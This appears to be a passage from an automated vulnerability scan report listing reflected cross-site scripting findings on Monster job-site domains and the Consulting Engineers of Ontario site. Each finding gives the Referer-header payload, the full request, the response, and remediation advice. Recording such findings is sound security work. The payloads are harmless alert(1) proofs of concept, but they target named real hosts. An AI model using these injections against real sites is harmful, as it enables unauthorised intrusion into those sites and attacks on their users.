Set-Cookie: split_scsjsv=96; domain=.monster.fr; expires=Sat, 26-Nov-2011 19:49:39 GMT; path=/
Set-Cookie: scsjsv=0; domain=.monster.fr; path=/
Set-Cookie: split_ssljsv=96; domain=.monster.fr; expires=Sat, 26-Nov-2011 19:49:39 GMT; path=/
Set-Cookie: ssljsv=0; domain=.monster.fr; path=/
Set-Cookie: webtrends_Profile=true; path=/
Set-Cookie: TC_Top=; expires=Wed, 27-Oct-2010 19:49:39 GMT; path=/
Set-Cookie: TC_Bottom=; expires=Wed, 27-Oct-2010 19:49:39 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 260041
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 22ff3'-alert(1)-'c8ff076af8 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1
Host: praca.monsterpolska.pl
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=22ff3'-alert(1)-'c8ff076af8
Response
HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 19:49:46 GMT
Server: Microsoft-IIS/6.0
P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=lre2n5fz5uz5qv45ufk5tvvr; path=/; HttpOnly
Set-Cookie: webtrends_Profile=true; path=/
Set-Cookie: TC_Top=; expires=Wed, 27-Oct-2010 19:49:46 GMT; path=/
Set-Cookie: TC_Bottom=; expires=Wed, 27-Oct-2010 19:49:46 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 379132
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98bc0'-alert(1)-'d81f1adf412 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1
Host: rabota.monsterrussia.ru
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=98bc0'-alert(1)-'d81f1adf412
Response
HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 19:49:44 GMT
Server: Microsoft-IIS/6.0
P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=gzvtxi45q31bcpa0z2exo145; path=/; HttpOnly
Set-Cookie: webtrends_Profile=true; path=/
Set-Cookie: TC_Top=; expires=Wed, 27-Oct-2010 19:49:44 GMT; path=/
Set-Cookie: TC_Bottom=; expires=Wed, 27-Oct-2010 19:49:44 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 226701
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 717c4'-alert(1)-'39a8c5280db was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, client-side technologies such as Flash could be used to cause another user's browser to make a request containing an arbitrary HTTP header. If such a technique is available, it can probably be leveraged to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Search.aspx HTTP/1.1
Host: recherche.monster.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=717c4'-alert(1)-'39a8c5280db
Response
HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 19:45:48 GMT
Server: Microsoft-IIS/6.0
P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=mj4rh055jmncxpreg51kbt45; path=/; HttpOnly
Set-Cookie: split_scsjsv=30; domain=.monster.ca; expires=Sat, 26-Nov-2011 19:45:47 GMT; path=/
Set-Cookie: scsjsv=0; domain=.monster.ca; path=/
Set-Cookie: JSRTimeStamp=634263795480019139; domain=.monster.ca; path=/
Set-Cookie: NumberOfJSR=1; domain=.monster.ca; path=/
Set-Cookie: BackToJSRLink=&referrer=search.aspx; domain=.monster.ca; path=/
Set-Cookie: TC_Top=; expires=Wed, 27-Oct-2010 19:45:48 GMT; path=/
Set-Cookie: TC_Bottom=; expires=Wed, 27-Oct-2010 19:45:48 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 721570
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 62e7d><script>alert(1)</script>c4421c022f6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, client-side technologies such as Flash could be used to cause another user's browser to make a request containing an arbitrary HTTP header. If such a technique is available, it can probably be leveraged to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /newsinfo/newsinfo.asp HTTP/1.1
Host: www.ceo.on.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASPSESSIONIDQSQQRBCA=LNJPLLEDAEFAAJMKLEOBBDKP;
Referer: http://www.google.com/search?hl=en&q=62e7d><script>alert(1)</script>c4421c022f6
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 25141
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Fri, 26 Nov 2010 19:49:51 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>CEO - Consulting Engineers of Ontario</title>
<META NAME="description" content="CEO - Consulting Engineers
...[SNIP]...
<a href=http://www.google.com/search?hl=en&q=62e7d><script>alert(1)</script>c4421c022f6>
...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 2e62a><script>alert(1)</script>7c0e996df4c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, client-side technologies such as Flash could be used to cause another user's browser to make a request containing an arbitrary HTTP header. If such a technique is available, it can probably be leveraged to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /subscribe.asp HTTP/1.1
Host: www.ceo.on.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASPSESSIONIDQSQQRBCA=LNJPLLEDAEFAAJMKLEOBBDKP;
Referer: http://www.google.com/search?hl=en&q=2e62a><script>alert(1)</script>7c0e996df4c
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21212
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Fri, 26 Nov 2010 19:52:10 GMT
Connection: close